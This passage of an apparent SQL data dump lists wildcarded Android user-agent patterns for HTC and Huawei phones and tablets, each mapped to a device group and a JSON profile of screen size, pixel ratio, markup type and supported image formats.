Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 628 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 628) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 728 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 728) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 728G dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 816 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 816) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 826) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 828 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 828) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 830 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire 830) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire EYE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC Desire Eye) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC M8Sw) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC One 801s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC One E9 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC One E9PLUS dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC One E9s dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC One M8s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC One M9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC One ME dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC One dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC One) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC One_E8W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC One_M8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC6525LVW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTCD100LVWPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTCONE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC_D728x) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC_D820u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC_Desire_816) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC_Desire_820_dual_sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC_Desire_EYE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC_E9pw) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC_M9e) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC_One) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC_One/7.18) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC_One_dual_sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HTC_One_max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":768,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI ALE-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI ATH-UL01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI CRR-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI CRR-UL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI CUN-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI CUN-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI CUN-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI CUN-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI CUN-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI CUN-L33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI CUN-U29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI G7-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI G7-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI G7-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI GRA-CL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI GRA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI GRA-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI GRA-UL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI KII-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI KII-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI KII-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LUA-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LUA-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LUA-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LUA-L13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LUA-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LUA-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LUA-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LUA-U02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LUA-U03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LUA-U22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LUA-U23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LYO-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LYO-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI LYO-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI M2-801L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_huawei','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI M2-801W) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_huawei','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI M2-802L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_huawei','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI M2-A01L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_huawei','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI M2-A01W) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_huawei','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI MT7-CL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI MT7-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 